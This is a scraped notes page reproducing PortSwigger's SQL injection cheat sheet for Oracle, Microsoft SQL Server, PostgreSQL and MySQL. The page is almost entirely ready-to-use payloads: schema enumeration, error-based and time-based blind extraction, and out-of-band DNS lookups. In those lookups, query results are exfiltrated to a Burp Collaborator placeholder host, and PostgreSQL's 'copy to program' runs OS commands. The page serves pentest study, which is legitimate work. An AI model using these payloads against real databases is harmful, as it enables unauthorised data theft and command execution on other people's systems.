PortSwigger SQL Injection CheatSheet

Payloads from Portswigger SQL Injection Cheat Sheet. ( I did not write any of these)

SQL Injection Cheat Sheet

This cheat sheet contains examples of useful syntax for performing various tasks during SQL injection attacks.

String Concatenation

You can concatenate multiple strings to make a single string.

Oracle:
```
sqlCopy code'foo'||'bar'
```
Microsoft:
```
sqlCopy code'foo'+'bar'
```
PostgreSQL:
```
sqlCopy code'foo'||'bar'
```

MySQL:

sqlCopy code'foo' 'bar'  -- Note the space between the two strings
CONCAT('foo','bar')

Substring

Extract part of a string from a specified offset with a specified length. The offset index is 1-based. Each example returns the string "ba".

Oracle:
```
sqlCopy codeSUBSTR('foobar', 4, 2)
```
Microsoft:
```
sqlCopy codeSUBSTRING('foobar', 4, 2)
```
PostgreSQL:
```
sqlCopy codeSUBSTRING('foobar', 4, 2)
```
MySQL:
```
sqlCopy codeSUBSTRING('foobar', 4, 2)
```

Comments

Use comments to truncate a query and remove the portion of the original query that follows your input.

Oracle:
```
sqlCopy code--comment
```
Microsoft:
```
sqlCopy code--comment
/*comment*/
```
PostgreSQL:
```
sqlCopy code--comment
/*comment*/
```

MySQL:

sqlCopy code#comment
-- comment  -- Note the space after the double dash
/*comment*/

Database Version

Query the database to determine its type and version. This information is useful for formulating more complicated attacks.

Oracle:

sqlCopy codeSELECT banner FROM v$version
SELECT version FROM v$instance

Microsoft:
```
sqlCopy codeSELECT @@version
```
PostgreSQL:
```
sqlCopy codeSELECT version()
```
MySQL:
```
sqlCopy codeSELECT @@version
```

Database Contents

List the tables that exist in the database, and the columns that those tables contain.

Oracle:

sqlCopy codeSELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'

Microsoft:

sqlCopy codeSELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

PostgreSQL:

sqlCopy codeSELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

MySQL:

sqlCopy codeSELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

Conditional Errors

Test a single boolean condition and trigger a database error if the condition is true.

Oracle:

sqlCopy codeSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1/0) ELSE NULL END FROM dual

Microsoft:

sqlCopy codeSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END

PostgreSQL:

sqlCopy code1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE NULL END)

MySQL:

sqlCopy codeSELECT IF(YOUR-CONDITION-HERE, (SELECT table_name FROM information_schema.tables), 'a')

Extracting Data via Visible Error Messages

Elicit error messages that leak sensitive data returned by your malicious query.

Microsoft:

sqlCopy codeSELECT 'foo' WHERE 1 = (SELECT 'secret')
-- Error: Conversion failed when converting the varchar value 'secret' to data type int.

PostgreSQL:

sqlCopy codeSELECT CAST((SELECT password FROM users LIMIT 1) AS int)
-- Error: invalid input syntax for integer: "secret"

MySQL:

sqlCopy codeSELECT 'foo' WHERE 1=1 AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT 'secret')))
-- Error: XPATH syntax error: '\secret'

Batched (or Stacked) Queries

Execute multiple queries in succession. Note that subsequent queries' results are not returned to the application.

Oracle:

sqlCopy code-- Does not support batched queries.

Microsoft:

sqlCopy codeQUERY-1-HERE; QUERY-2-HERE
QUERY-1-HERE QUERY-2-HERE

PostgreSQL:
```
sqlCopy codeQUERY-1-HERE; QUERY-2-HERE
```
MySQL:
```
sqlCopy codeQUERY-1-HERE; QUERY-2-HERE
```

Time Delays

Cause a time delay in the database when the query is processed.

Oracle:

sqlCopy codedbms_pipe.receive_message(('a'),10)

Microsoft:
```
sqlCopy codeWAITFOR DELAY '0:0:10'
```
PostgreSQL:
```
sqlCopy codeSELECT pg_sleep(10)
```
MySQL:
```
sqlCopy codeSELECT SLEEP(10)
```

Conditional Time Delays

Test a single boolean condition and trigger a time delay if the condition is true.

Oracle:

sqlCopy codeSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual

Microsoft:

sqlCopy codeIF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'

PostgreSQL:

sqlCopy codeSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END

MySQL:

sqlCopy codeSELECT IF(YOUR-CONDITION-HERE, SLEEP(10), 'a')

DNS Lookup

Cause the database to perform a DNS lookup to an external domain. Use Burp Collaborator to generate a unique subdomain and confirm the DNS lookup.

Oracle:

sqlCopy code-- (XXE)
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual

-- Fully patched Oracle installations (requires elevated privileges)
SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')

Microsoft:

sqlCopy codeexec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'

PostgreSQL:

sqlCopy codecopy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'

MySQL:

sqlCopy codeLOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')
SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\\a'

DNS Lookup with Data Exfiltration

Perform a DNS lookup to an external domain containing the results of an injected query. Use Burp Collaborator to retrieve details of any DNS interactions.

Oracle:

sqlCopy codeSELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual

Microsoft:

sqlCopy codedeclare @p varchar(1024); set @p=(SELECT YOUR-QUERY-HERE); exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')

PostgreSQL:

plpgsqlCopy codecreate OR replace function f() returns void as $$
declare c text;
declare p text;
begin
  SELECT into p (SELECT YOUR-QUERY-HERE);
  c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
  execute c;
END;
$$
language plpgsql security definer;
SELECT f();

MySQL:

sqlCopy codeSELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\\a'

Use these examples as a reference for common SQL injection techniques and payloads. Remember to use these techniques ethically and legally, only testing systems you have explicit permission to test.

Source

PreviousCommonly Used Linux Commands NexteJPT/eCPPT Notes

Last updated 8 months ago

sqlCopy code-- (XXE) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual -- Fully patched Oracle installations (requires elevated privileges) SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')

sqlCopy codeSELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual

plpgsqlCopy codecreate OR replace function f() returns void as $$ declare c text; declare p text; begin SELECT into p (SELECT YOUR-QUERY-HERE); c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN'''; execute c; END; $$ language plpgsql security definer; SELECT f();